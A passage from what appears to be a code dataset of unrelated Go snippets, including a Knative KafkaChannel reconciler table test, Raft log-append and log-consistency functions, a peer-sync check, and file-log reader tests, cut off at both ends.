[]runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWithReactors: []clientgotesting.ReactionFunc{InduceFailure(\"create\", \"Services\")},\n\t\t\tWantErr: true,\n\t\t\tWantCreates: []runtime.Object{controllertesting.NewKafkaChannelDispatcherService()},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t// Note - Not currently tracking status for the Dispatcher Service since it is only for Prometheus\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tEventf(corev1.EventTypeWarning, event.DispatcherServiceReconciliationFailed.String(), \"Failed To Reconcile Dispatcher Service: inducing failure for create services\"),\n\t\t\t\tcontrollertesting.NewKafkaChannelFailedReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Dispatcher Service With Deletion Timestamp And Finalizer\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(controllertesting.WithDeletionTimestampService),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantErr: false,\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Dispatcher Service With Deletion Timestamp And Missing Finalizer\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(controllertesting.WithoutFinalizersService, controllertesting.WithDeletionTimestampService),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(),\n\t\t\t},\n\t\t\tWantErr: false,\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t},\n\n\t\t//\n\t\t// KafkaChannel Dispatcher Deployment\n\t\t//\n\n\t\t{\n\t\t\tName: \"Reconcile Missing Dispatcher Deployment Success\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t},\n\t\t\tWantCreates: []runtime.Object{controllertesting.NewKafkaChannelDispatcherDeployment()},\n\t\t\tWantEvents: []string{controllertesting.NewKafkaChannelSuccessfulReconciliationEvent()},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Missing Dispatcher Deployment Error(Create)\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t},\n\t\t\tWithReactors: []clientgotesting.ReactionFunc{InduceFailure(\"create\", \"Deployments\")},\n\t\t\tWantErr: true,\n\t\t\tWantCreates: []runtime.Object{controllertesting.NewKafkaChannelDispatcherDeployment()},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t{\n\t\t\t\t\tObject: controllertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithReceiverServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithReceiverDeploymentReady,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherFailed,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t},\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tEventf(corev1.EventTypeWarning, event.DispatcherDeploymentReconciliationFailed.String(), \"Failed To Reconcile Dispatcher Deployment: inducing failure for create deployments\"),\n\t\t\t\tcontrollertesting.NewKafkaChannelFailedReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Dispatcher Deployment With Deletion Timestamp And Finalizer\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithDeletionTimestampDeployment),\n\t\t\t},\n\t\t\tWantErr: false,\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Dispatcher Deployment With Deletion Timestamp And Missing Finalizer\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithoutFinalizersDeployment, controllertesting.WithDeletionTimestampDeployment),\n\t\t\t},\n\t\t\tWantErr: false,\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Reconcile Dispatcher Deployment - Redeployment on ConfigMapHash change\",\n\t\t\tSkipNamespaceValidation: true,\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(\n\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\tcontrollertesting.WithMetaData,\n\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverServiceReady,\n\t\t\t\t\tcontrollertesting.WithReceiverDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithDispatcherDeploymentReady,\n\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelReceiverDeployment(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithConfigMapHash(\"initial-hash-to-be-overridden-by-controller\")),\n\t\t\t},\n\t\t\tWantUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\tcontrollertesting.NewDeploymentUpdateActionImpl(controllertesting.NewKafkaChannelDispatcherDeployment()),\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeploymentUpdatedEvent(),\n\t\t\t\tcontrollertesting.NewKafkaChannelSuccessfulReconciliationEvent(),\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tName: \"Missing KafkaSecret - Error\",\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(controllertesting.WithFinalizer),\n\t\t\t},\n\t\t\tWantEvents: []string{\n\t\t\t\tEventf(corev1.EventTypeWarning, \"InternalError\", \"reconciliation failed\"),\n\t\t\t},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t{\n\t\t\t\t\tObject: controllertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelConfigurationFailedNoSecret,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t},\n\t\t\t},\n\t\t\tWantErr: true,\n\t\t\tOtherTestData: map[string]interface{}{\n\t\t\t\t\"reconcilerOptions\": []reconcilerOption{withEmptyKafkaSecret},\n\t\t\t},\n\t\t},\n\n\t\t//\n\t\t// Deployment Updating - Repairing Incorrect Or Missing Fields In Existing Deployments\n\t\t//\n\n\t\tnewDispatcherUpdateTest(\"No Resources\", controllertesting.WithoutResources),\n\t\tnewDispatcherUpdateTest(\"Different Name\", controllertesting.WithDifferentName),\n\t\tnewDispatcherUpdateTest(\"Different Image\", controllertesting.WithDifferentImage),\n\t\tnewDispatcherUpdateTest(\"Different Command\", controllertesting.WithDifferentCommand),\n\t\tnewDispatcherUpdateTest(\"Different Args\", controllertesting.WithDifferentArgs),\n\t\tnewDispatcherUpdateTest(\"Different WorkingDir\", controllertesting.WithDifferentWorkingDir),\n\t\tnewDispatcherUpdateTest(\"Different Ports\", controllertesting.WithDifferentPorts),\n\t\tnewDispatcherUpdateTest(\"Different Environment\", controllertesting.WithMissingEnvironment),\n\t\tnewDispatcherUpdateTest(\"Different Environment\", controllertesting.WithDifferentEnvironment),\n\t\tnewDispatcherUpdateTest(\"Different VolumeMounts\", controllertesting.WithDifferentVolumeMounts),\n\t\tnewDispatcherUpdateTest(\"Different VolumeDevices\", controllertesting.WithDifferentVolumeDevices),\n\t\tnewDispatcherUpdateTest(\"Different LivenessProbe\", controllertesting.WithDifferentLivenessProbe),\n\t\tnewDispatcherUpdateTest(\"Different ReadinessProbe\", controllertesting.WithDifferentReadinessProbe),\n\t\tnewDispatcherUpdateTest(\"Missing Labels\", controllertesting.WithoutLabels),\n\t\tnewDispatcherUpdateTest(\"Missing Annotations\", controllertesting.WithoutAnnotations),\n\t\tnewDispatcherNoUpdateTest(\"Different Lifecycle\", controllertesting.WithDifferentLifecycle),\n\t\tnewDispatcherNoUpdateTest(\"Different TerminationPath\", controllertesting.WithDifferentTerminationPath),\n\t\tnewDispatcherNoUpdateTest(\"Different TerminationPolicy\", controllertesting.WithDifferentTerminationPolicy),\n\t\tnewDispatcherNoUpdateTest(\"Different ImagePullPolicy\", controllertesting.WithDifferentImagePullPolicy),\n\t\tnewDispatcherNoUpdateTest(\"Different SecurityContext\", controllertesting.WithDifferentSecurityContext),\n\t\tnewDispatcherNoUpdateTest(\"Different Replicas\", controllertesting.WithDifferentReplicas),\n\t\tnewDispatcherNoUpdateTest(\"Extra Labels\", controllertesting.WithExtraLabels),\n\t\tnewDispatcherNoUpdateTest(\"Extra Annotations\", controllertesting.WithExtraAnnotations),\n\n\t\t//\n\t\t// Deployment Update Failure\n\t\t//\n\n\t\t{\n\t\t\tName: \"Existing Dispatcher Deployment, Different Image, Update Error\",\n\t\t\tKey: controllertesting.KafkaChannelKey,\n\t\t\tObjects: []runtime.Object{\n\t\t\t\tcontrollertesting.NewKafkaChannel(controllertesting.WithFinalizer),\n\t\t\t\tcontrollertesting.NewKafkaChannelService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherService(),\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeployment(controllertesting.WithDifferentImage),\n\t\t\t},\n\t\t\tWantStatusUpdates: []clientgotesting.UpdateActionImpl{\n\t\t\t\t{\n\t\t\t\t\tObject: controllertesting.NewKafkaChannel(\n\t\t\t\t\t\tcontrollertesting.WithFinalizer,\n\t\t\t\t\t\tcontrollertesting.WithAddress,\n\t\t\t\t\t\tcontrollertesting.WithInitializedConditions,\n\t\t\t\t\t\tcontrollertesting.WithKafkaChannelServiceReady,\n\t\t\t\t\t\tcontrollertesting.WithDispatcherUpdateFailed,\n\t\t\t\t\t\tcontrollertesting.WithTopicReady,\n\t\t\t\t\t),\n\t\t\t\t},\n\t\t\t},\n\t\t\tWantUpdates: []clientgotesting.UpdateActionImpl{{Object: controllertesting.NewKafkaChannelDispatcherDeployment()}},\n\t\t\tWantEvents: []string{\n\t\t\t\tcontrollertesting.NewKafkaChannelDispatcherDeploymentUpdateFailedEvent(),\n\t\t\t\tEventf(corev1.EventTypeWarning, event.DispatcherDeploymentReconciliationFailed.String(), \"Failed To Reconcile Dispatcher Deployment: inducing failure for update deployments\"),\n\t\t\t\tcontrollertesting.NewKafkaChannelFailedReconciliationEvent(),\n\t\t\t},\n\t\t\tWithReactors: []clientgotesting.ReactionFunc{\n\t\t\t\tInduceFailure(\"update\", \"Deployments\"),\n\t\t\t},\n\t\t\tWantErr: true,\n\t\t},\n\n\t\t//\n\t\t// Service Patching - Repairing Incorrect Or Missing Fields In Existing Services\n\t\t//\n\n\t\tnewServicePatchTest(\"Missing Ports\", controllertesting.WithoutServicePorts),\n\t\tnewServicePatchTest(\"Missing App Label Selector\", controllertesting.WithoutServiceSelector),\n\t\tnewServicePatchTest(\"Missing Labels\", controllertesting.WithoutServiceLabels),\n\t\tnewServiceNoPatchTest(\"Extra Labels\", controllertesting.WithExtraServiceLabels),\n\t\tnewServiceNoPatchTest(\"Different Status\", controllertesting.WithDifferentServiceStatus),\n\n\t\t//\n\t\t// Service Patch Failure\n\t\t//\n\n\t\tnewServicePatchFailureTest(\"Missing Ports\", controllertesting.WithoutServicePorts),\n\t\tnewServicePatchFailureTest(\"Missing Labels\", controllertesting.WithoutServiceLabels),\n\t}\n\n\t// Create A Mock AdminClient\n\tmockAdminClient := &controllertesting.MockAdminClient{}\n\n\t// Stub The Creation Of AdminClient\n\tkafkaadmintesting.StubNewAdminClientFn(kafkaadmintesting.NonValidatingNewAdminClientFn(mockAdminClient))\n\tdefer kafkaadmintesting.RestoreNewAdminClientFn()\n\n\t// Run The TableTest Using The KafkaChannel Reconciler Provided By The Factory\n\tlogger := logtesting.TestLogger(t)\n\ttableTest.Test(t, controllertesting.MakeFactory(func(ctx context.Context, listers *controllertesting.Listers, cmw configmap.Watcher, options map[string]interface{}) controller.Reconciler {\n\n\t\tconfigOptionsInt, ok := options[\"configOptions\"]\n\t\tif !ok || configOptionsInt == nil {\n\t\t\tconfigOptionsInt = []controllertesting.KafkaConfigOption{}\n\t\t}\n\t\tconfigOptions := configOptionsInt.([]controllertesting.KafkaConfigOption)\n\n\t\tr := &Reconciler{\n\t\t\tkubeClientset: kubeclient.Get(ctx),\n\t\t\tadminClientType: types.Kafka,\n\t\t\tadminClient: nil,\n\t\t\tenvironment: controllertesting.NewEnvironment(),\n\t\t\tconfig: controllertesting.NewConfig(configOptions...),\n\t\t\tkafkachannelLister: listers.GetKafkaChannelLister(),\n\t\t\tkafkachannelInformer: nil,\n\t\t\tdeploymentLister: listers.GetDeploymentLister(),\n\t\t\tserviceLister: listers.GetServiceLister(),\n\t\t\tkafkaClientSet: fakekafkaclient.Get(ctx),\n\t\t\tadminMutex: &sync.Mutex{},\n\t\t\tkafkaBrokers: controllertesting.KafkaSecretDataValueBrokers,\n\t\t\tkafkaSecret: controllertesting.KafkaSecretName,\n\t\t\tkafkaUsername: controllertesting.KafkaSecretDataValueUsername,\n\t\t\tkafkaPassword: controllertesting.KafkaSecretDataValuePassword,\n\t\t\tkafkaSaslType: controllertesting.KafkaSecretDataValueSaslType,\n\t\t\tkafkaConfigMapHash: controllertesting.ConfigMapHash,\n\t\t}\n\n\t\treconcilerOptions, ok := options[\"reconcilerOptions\"]\n\t\tif ok {\n\t\t\tfor _, option := range reconcilerOptions.([]reconcilerOption) {\n\t\t\t\toption(r)\n\t\t\t}\n\t\t}\n\n\t\treturn kafkachannelreconciler.NewReconciler(ctx, logger, r.kafkaClientSet, listers.GetKafkaChannelLister(), controller.GetEventRecorder(ctx), r)\n\t}, logger.Desugar()))\n}", "func (pm *BaseProtocolManager) syncOplogInvalidIsToSyncPeer(\n\tpeer *PttPeer,\n\ttheirSyncTS types.Timestamp,\n\tmySyncTS types.Timestamp,\n) bool {\n\n\tptt := pm.Router()\n\tmyID := ptt.GetMyEntity().GetID()\n\tmyNodeID := ptt.MyNodeID()\n\n\tisMe := peer.PeerType == PeerTypeMe\n\tisMeMaster := pm.IsMaster(myID, false)\n\tisPeerMaster := pm.IsMaster(peer.UserID, false)\n\n\tif !isMe && !isPeerMaster {\n\t\treturn false\n\t}\n\n\tif !isMe && !isMeMaster && isPeerMaster {\n\t\treturn true\n\t}\n\n\tif theirSyncTS.IsLess(mySyncTS) {\n\t\treturn false\n\t}\n\tif mySyncTS.IsLess(theirSyncTS) {\n\t\treturn true\n\t}\n\n\t// Me: follow the smallest node-id\n\tif isMe {\n\t\tpeerNodeID := peer.GetID()\n\t\tif bytes.Compare(myNodeID[:], peerNodeID[:]) < 0 {\n\t\t\treturn false\n\t\t}\n\n\t\treturn true\n\t}\n\n\t// masters: follow the smallest master-id\n\tif bytes.Compare(myID[:], peer.UserID[:]) < 0 {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (r *Raft) AppendToLog_Leader(cmd []byte) {\n\tterm := r.currentTerm\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field with acks set to 0\n\t//fmt.Println(\"Before putting in log,\", logVal)\n\tr.myLog = append(r.myLog, logVal)\n\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Added cmd to my log\")\n\n\t//modify metadata after appending\n\t//fmt.Println(\"Metadata before appending,lastLogIndex,prevLogIndex,prevLogTerm\", r.myMetaData.lastLogIndex, r.myMetaData.prevLogIndex, r.myMetaData.prevLogTerm)\n\tlastLogIndex := r.myMetaData.lastLogIndex + 1\n\tr.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\tr.myMetaData.lastLogIndex = lastLogIndex\n\t//fmt.Println(r.myId(), \"Length of my log is\", len(r.myLog))\n\tif len(r.myLog) == 1 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //as for empty log prevLogTerm is -2\n\n\t} else if len(r.myLog) > 1 { //explicit check, else would have sufficed too, just to eliminate len=0 possibility\n\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t}\n\t//r.currentTerm = term\n\t//fmt.Println(\"I am leader, Appended to log, last index, its term is\", r.myMetaData.lastLogIndex, r.myLog[lastLogIndex].term)\n\t//fmt.Println(\"Metadata after appending,lastLogIndex,prevLogIndex,prevLogTerm\", r.myMetaData.lastLogIndex, r.myMetaData.prevLogIndex, r.myMetaData.prevLogTerm)\n\tr.setNextIndex_All() //Added-28 march for LogRepair\n\t//Write to disk\n\t//fmt.Println(r.myId(), \"In append_leader, appended to log\", string(cmd))\n\tr.WriteLogToDisk()\n\n}", "func TestReadExistingAndNewLogs(t *testing.T) {\n\tt.Parallel()\n\toperator, logReceived, tempDir := newTestFileOperator(t, nil)\n\n\t// Start with a file with an entry in it, and expect that entry\n\t// to come through when we poll for the first time\n\ttemp := openTemp(t, tempDir)\n\twriteString(t, temp, \"testlog1\\n\")\n\n\trequire.NoError(t, operator.Start(testutil.NewMockPersister(\"test\")))\n\tdefer func() {\n\t\trequire.NoError(t, operator.Stop())\n\t}()\n\n\twaitForMessage(t, logReceived, \"testlog1\")\n\n\t// Write a second entry, and expect that entry to come through\n\t// as well\n\twriteString(t, temp, \"testlog2\\n\")\n\twaitForMessage(t, logReceived, \"testlog2\")\n}", "func (rf *Raft) correctPrevLogEntry(PrevLogIndex int, PrevLogTerm int) bool {\n\t// if no log, have to check lastIncludedIndex and lastIncludedTerm\n\tif len(rf.log) == 0 {\n\t\treturn PrevLogIndex == rf.lastIncludedIndex && PrevLogTerm == rf.lastIncludedTerm\n\t}\n\tprevRaftLogIndex := rf.getTrimmedLogIndex(PrevLogIndex)\n\t// the leader nextIndex is ahead of us\n\tif prevRaftLogIndex >= len(rf.log) {\n\t\treturn false\n\t}\n\n\t// NOTE:\n\t// if prevRaftLogIndex == -1 ... this should never happen?\n\t// We know length of rf.log > 0 (see where this function is called), so this\n\t// would only occur if leader nextIndex for this server preceded our snapshot;\n\t// but on leader election, nextIndex is set to the end of the leader log,\n\t// including all committed entries.\n\t// However, our snapshot includes AT MOST all committed entries,\n\t// so nextIndex should never precede it.\n\tif prevRaftLogIndex == -1 && len(rf.log) > 0 {\n\t\trf.Log(LogInfo, \"AppendEntries call has PrevLogIndex preceding our log!\")\n\t\treturn true\n\t}\n\n\t// we must have an entry at the given index (see above note for why\n\t// PrevLogIndex will never precede our snapshot), so just return a bool for whether\n\t// or not the term of this entry is correct\n\treturn rf.log[prevRaftLogIndex].Term == PrevLogTerm\n\n}", "func TestRGITBasic_TestDeleteRaftLogWhenNewTermElection(t *testing.T) {\n\n\ttestInitAllDataFolder(\"TestRGIT_TestDeleteRaftLogWhenNewTermElection\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 10)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t// get leader information\n\tleaderNode := testGetLeaderNode(t, raftGroupNodes)\n\tlastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tlastTerm, err := leaderNode.storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\tfmt.Printf(\"first propose, last index:%d, last term: %d\\n\", lastIndex, lastTerm)\n\n\t// stop 2 raft node\n\traftGroupNodes[0].Stop()\n\traftGroupNodes[1].Stop()\n\n\t// insert wrong message(which will be replace by new leader) into the last node\n\twrongMessages := testCreateMessages(t, 20)\n\twrongEntries := make([]raftpb.Entry, 0)\n\n\tfor i, msg := range wrongMessages {\n\t\tb := make([]byte, 8+len(msg))\n\t\tbinary.BigEndian.PutUint64(b, uint64(i+1))\n\t\tcopy(b[8:], []byte(msg))\n\n\t\tentry := raftpb.Entry{\n\t\t\tTerm: lastTerm,\n\t\t\tIndex: lastIndex + uint64(i+1),\n\t\t\tType: raftpb.EntryNormal,\n\t\t\tData: b,\n\t\t}\n\t\twrongEntries = append(wrongEntries, entry)\n\n\t}\n\traftGroupNodes[2].storage.StoreEntries(wrongEntries)\n\tfmt.Printf(\"save wrong message success, begin index: %d, term: %d\\n\", wrongEntries[0].Index, wrongEntries[0].Term)\n\twrongIndex, err := raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"save wrong message to node[2], last index :%d\", wrongIndex)\n\n\traftGroupNodes[2].Stop()\n\n\t// restart\n\traftGroupNodes[0].Start()\n\traftGroupNodes[1].Start()\n\n\t// wait a new leader\n\ttime.Sleep(5 * time.Second)\n\tleaderNode = testGetLeaderNode(t, raftGroupNodes)\n\tleaderLastIndex, err := leaderNode.storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tleaderLastTerm, err := leaderNode.storage.Term(leaderLastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\tfmt.Printf(\"after restart, leader last term: %d, last index: %d\\n\", leaderLastTerm, leaderLastIndex)\n\n\t// start the last one node\n\traftGroupNodes[2].Start()\n\t// wait leader append entries\n\ttime.Sleep(5 * time.Second)\n\n\t// check the raft log of last node will be replicated by new leader\n\tlastIndex, err = raftGroupNodes[2].storage.LastIndex()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tlastTerm, err = raftGroupNodes[2].storage.Term(lastIndex)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tt.Logf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\tfmt.Printf(\"the node with wrong message after restart, last term: %d, last index:%d \\n\", lastTerm, lastIndex)\n\n\tif lastIndex != leaderLastIndex {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node index:%d, but the leader:%d\", lastIndex, leaderLastIndex)\n\t}\n\n\tif lastTerm != leaderLastTerm {\n\t\tt.Fatalf(\"the node[2] after restart doesn't match the new leader, the wrong node term :%d, but the leader:%d\", lastTerm, leaderLastTerm)\n\t}\n\n}", "func TestLogging(t *testing.T) {\n\ttmpOut := bytes.Buffer{}\n\n\tlogger := log.New()\n\tlogger.Out = &tmpOut\n\tlogger.Level = 